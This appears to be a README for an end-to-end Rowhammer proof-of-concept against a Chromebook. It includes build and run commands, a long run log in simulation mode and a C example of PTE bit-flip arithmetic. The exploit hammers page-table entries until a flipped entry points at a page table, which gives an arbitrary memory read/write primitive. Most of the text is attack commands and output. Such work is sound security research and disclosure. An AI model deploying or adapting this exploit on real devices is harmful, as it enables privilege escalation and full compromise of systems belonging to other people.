This end-to-end exploit combines all the previous building blocks to hammer a PTE, leading to an arbitrary read/write primitive. The end-to-end exploit also features a simulation mode, where the bit flips are simulated, i.e., induced via a privileged interface instead of through Rowhammer. This simulation mode can be used to reduce the testing time.
This PoC consists of multiple parts.
To build, run the following command:
make
To build in simulation mode, run:
make simulate
To run the PoC on the Chromebook, run:
./kukui_exploit
opened pagemap
address: 0x72a2ce9000
aligned address: 0x72a2e00000
got address: 0x72a2e00000 0
got memory 0x72a2e00000
mapped all pages 2643386368
Search for contiguous memory areas
Found 46 contiguous rows
Found 44 contiguous rows
Found 42 contiguous rows
Found 40 contiguous rows
Found 38 contiguous rows
Found 36 contiguous rows
Found 34 contiguous rows
Found 32 contiguous rows
Found 46 contiguous rows
Found 38 contiguous rows
Found 36 contiguous rows
Found 34 contiguous rows
Found 32 contiguous rows
Found 38 contiguous rows
Found 166 contiguous rows
Found 164 contiguous rows
Found 161 contiguous rows
Found 160 contiguous rows
Found 157 contiguous rows
Found 155 contiguous rows
Found 153 contiguous rows
Found 151 contiguous rows
Found 0 contiguous rows
remove_duplicate_contig_areas
done
Found 4 contiguous memory areas
Total length: 1719 rows
Took 6597 ms
g_file_size=4 MB
iterations=48640
populated pages
unmapping victim pages
spawn_spray_children
opened pagemap
C1 child process started
8 400000
C1 waiting
free ram: 3260620800
C0 victim: 0
C1 victim: 0
C1 0
C1 5000
C0 5000
C1 10000
C0 10000
C1 15000
C1 20000
C0 15000
C1 25000
C0 20000
C1 30000
C0 25000
C1 35000
C1 40000
C0 30000
C1 45000
C0 35000
0
C1 spray_page_tables done
C1 waiting
C0 40000
C0 45000
0
Waiting for children
content: 6800006f9a5fd3
13699a000 2
content: deadbeef00000003
content: 6800006f9a5fd3
1369b0000 5
content: deadbeef00000006
content: 6800005810bfd3
1196fc000 8
content: deadbeef00000009
content: 6800006db65fd3
1196d6000 11
content: deadbeef0000000c
content: 6800006f9a5fd3
1196cf000 14
content: 6800006db65fd3
content: 680001227e2fd3
12281a000 17
content: deadbeef00000012
content: 6800005810bfd3
122830000 20
content: deadbeef00000015
content: 6800006db65fd3
10c5fc000 23
content: deadbeef00000018
content: 6800005810bfd3
10c5d6000 26
content: deadbeef0000001b
pt_counter: 209 6800006f9a5fd3
Hammer the victim rows and check the mappings in parallel
0 / 20
0x13699a000: 6800006f9a5fd3
victim content: 6800006f9a5fd3
pointing to 6f9a5000
content: 1234567800033400
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006f8a5fd3
Changed bit 20 to 0
probably changed a page table
pointing to 6f8a5000
content: 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f8a5fd3
after: val=0x6800006f9a5fd3
Changed bit 20 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006fba5fd3
Changed bit 21 to 1
probably changed a page table
pointing to 6fba5000
content: f761bf084ff0e8bd
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006fba5fd3
after: val=0x6800006f9a5fd3
Changed bit 21 to 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006fda5fd3
Changed bit 22 to 1
probably changed a page table
pointing to 6fda5000
content: 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006fda5fd3
after: val=0x6800006f9a5fd3
Changed bit 22 to 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006f1a5fd3
Changed bit 23 to 0
probably changed a page table
pointing to 6f1a5000
content: 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f1a5fd3
after: val=0x6800006f9a5fd3
Changed bit 23 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006e9a5fd3
Changed bit 24 to 0
probably changed a page table
pointing to 6e9a5000
content: 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006e9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 24 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006d9a5fd3
Changed bit 25 to 0
probably changed a page table
pointing to 6d9a5000
content: 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006d9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 25 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800006b9a5fd3
Changed bit 26 to 0
probably changed a page table
pointing to 6b9a5000
content: 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006b9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 26 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x680000679a5fd3
Changed bit 27 to 0
probably changed a page table
pointing to 679a5000
content: 1
Test mode: Flipping bit at address 13699a000...
before: val=0x680000679a5fd3
after: val=0x6800006f9a5fd3
Changed bit 27 to 1
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800007f9a5fd3
Changed bit 28 to 1
probably changed a page table
pointing to 7f9a5000
content: 8f3f2000
Test mode: Flipping bit at address 13699a000...
before: val=0x6800007f9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 28 to 0
Test mode: Flipping bit at address 13699a000...
before: val=0x6800006f9a5fd3
after: val=0x6800004f9a5fd3
Changed bit 29 to 0
probably changed a page table
pointing to 4f9a5000
content: 680001227e2fd3
pointing to a page table \o/
2 / 46 0x1369b0000: 6800006f9a5fd3
victim content: 6800006f9a5fd3
pointing to 6f9a5000
content: 1234567800033400
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006f8a5fd3
Changed bit 20 to 0
probably changed a page table
pointing to 6f8a5000
content: 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f8a5fd3
after: val=0x6800006f9a5fd3
Changed bit 20 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006fba5fd3
Changed bit 21 to 1
probably changed a page table
pointing to 6fba5000
content: f761bf084ff0e8bd
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006fba5fd3
after: val=0x6800006f9a5fd3
Changed bit 21 to 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006fda5fd3
Changed bit 22 to 1
probably changed a page table
pointing to 6fda5000
content: 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006fda5fd3
after: val=0x6800006f9a5fd3
Changed bit 22 to 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006f1a5fd3
Changed bit 23 to 0
probably changed a page table
pointing to 6f1a5000
content: 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f1a5fd3
after: val=0x6800006f9a5fd3
Changed bit 23 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006e9a5fd3
Changed bit 24 to 0
probably changed a page table
pointing to 6e9a5000
content: 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006e9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 24 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006d9a5fd3
Changed bit 25 to 0
probably changed a page table
pointing to 6d9a5000
content: 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006d9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 25 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800006b9a5fd3
Changed bit 26 to 0
probably changed a page table
pointing to 6b9a5000
content: 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006b9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 26 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x680000679a5fd3
Changed bit 27 to 0
probably changed a page table
pointing to 679a5000
content: 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x680000679a5fd3
after: val=0x6800006f9a5fd3
Changed bit 27 to 1
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800007f9a5fd3
Changed bit 28 to 1
probably changed a page table
pointing to 7f9a5000
content: 8f3f2000
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800007f9a5fd3
after: val=0x6800006f9a5fd3
Changed bit 28 to 0
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800006f9a5fd3
after: val=0x6800004f9a5fd3
Changed bit 29 to 0
probably changed a page table
pointing to 4f9a5000
content: 680001227e2fd3
pointing to a page table \o/
5 / 46
hammering done
Check mappings
C0 0 / 48639 accessible: 973, inaccessible: 51
C1 0 / 48639 accessible: 924, inaccessible: 100
0 / 20
0x13699a000: 6800004f9a5fd3
victim content: 6800004f9a5fd3
pointing to 4f9a5000
content: 680001227e2fd3
Test mode: Flipping bit at address 13699a000...
before: val=0x6800004f9a5fd3
after: val=0x6800004f8a5fd3
Changed bit 20 to 0
probably changed a page table
pointing to 4f8a5000
content: 680001227e2fd3
pointing to a page table \o/
2 / 46 0x1369b0000: 6800004f9a5fd3
victim content: 6800004f9a5fd3
pointing to 4f9a5000
content: 680001227e2fd3
Test mode: Flipping bit at address 1369b0000...
before: val=0x6800004f9a5fd3
after: val=0x6800004f8a5fd3
Changed bit 20 to 0
probably changed a page table
pointing to 4f8a5000
content: 680001227e2fd3
pointing to a page table \o/
5 / 46
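The log above shows what a flip in the output-address field (bits 47:12) of an AArch64 page descriptor does: the victim PTE 0x6800006f9a5fd3 mapping 0x6f9a5000 becomes 0x6800006f8a5fd3 after bit 20 is cleared and then maps 0x6f8a5000, and the PoC reads the newly mapped page to decide whether it is a page table. The following C program is an added example, not code from the PoC: it reproduces the bit-flip arithmetic of the simulation mode on the logged PTE value and uses a hypothetical page-table heuristic of its own (count entries whose low attribute bits match a known-good descriptor) on constructed sample pages; the threshold, the 512-entry layout and the sample contents are assumptions of this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* AArch64 level-3 (4 KiB page) descriptor fields, 48-bit output address. */
#define PTE_TYPE_MASK    0x3ULL                /* bits 1:0, 0b11 = page descriptor */
#define PTE_ATTR_LO_MASK 0xfffULL              /* bits 11:0: type, AttrIndx, AP, SH, AF, nG */
#define PTE_OA_MASK      0x0000fffffffff000ULL /* bits 47:12: output (physical) address */
#define ENTRIES_PER_PT   512                   /* 4 KiB page / 8-byte entries */

/* Physical page a descriptor points to; any flip in bits 47:12 moves it. */
uint64_t pte_output_addr(uint64_t pte) { return pte & PTE_OA_MASK; }

/* One single-bit flip of a 64-bit word, as the PoC's simulation mode induces. */
uint64_t flip_bit(uint64_t val, unsigned bit) { return val ^ (1ULL << bit); }

/* Hypothetical heuristic of this example (not the PoC's pt_counter code):
 * count entries whose low attribute bits equal those of a known-good PTE. */
size_t count_page_descriptors(const uint64_t *page, uint64_t template_pte) {
    size_t n = 0;
    for (size_t i = 0; i < ENTRIES_PER_PT; i++)
        if ((page[i] & PTE_ATTR_LO_MASK) == (template_pte & PTE_ATTR_LO_MASK)) n++;
    return n;
}

/* A page holding at least `threshold` consistent descriptors is treated as a page table. */
bool looks_like_page_table(const uint64_t *page, uint64_t template_pte, size_t threshold) {
    return count_page_descriptors(page, template_pte) >= threshold;
}

/* Constructed sample pages (not captured from a device): a page table with
 * `n_valid` page descriptors, and a data page filled with the PoC's marker. */
void build_sample_table(uint64_t *page, size_t n_valid, uint64_t template_pte) {
    for (size_t i = 0; i < ENTRIES_PER_PT; i++)
        page[i] = i < n_valid ? ((template_pte & PTE_ATTR_LO_MASK) | ((0x40000ULL + i) << 12)) : 0;
}
void build_sample_data(uint64_t *page) {
    for (size_t i = 0; i < ENTRIES_PER_PT; i++) page[i] = 0xdeadbeef00000000ULL | i;
}

int main(void) {
    const uint64_t victim = 0x6800006f9a5fd3ULL; /* PTE value taken from the log above */
    uint64_t table[ENTRIES_PER_PT], data[ENTRIES_PER_PT];
    build_sample_table(table, 209, victim);      /* 209 entries, like "pt_counter: 209" */
    build_sample_data(data);
    printf("table page: %zu descriptors -> %s\n", count_page_descriptors(table, victim),
           looks_like_page_table(table, victim, 64) ? "page table" : "data");
    printf("data page:  %zu descriptors -> %s\n", count_page_descriptors(data, victim),
           looks_like_page_table(data, victim, 64) ? "page table" : "data");
    for (unsigned bit = 20; bit <= 29; bit++) { /* same PFN bits the log walks through */
        uint64_t flipped = flip_bit(victim, bit);
        printf("bit %u: %016llx -> pointing to %llx\n", bit,
               (unsigned long long)flipped, (unsigned long long)pte_output_addr(flipped));
    }
    return 0;
}
```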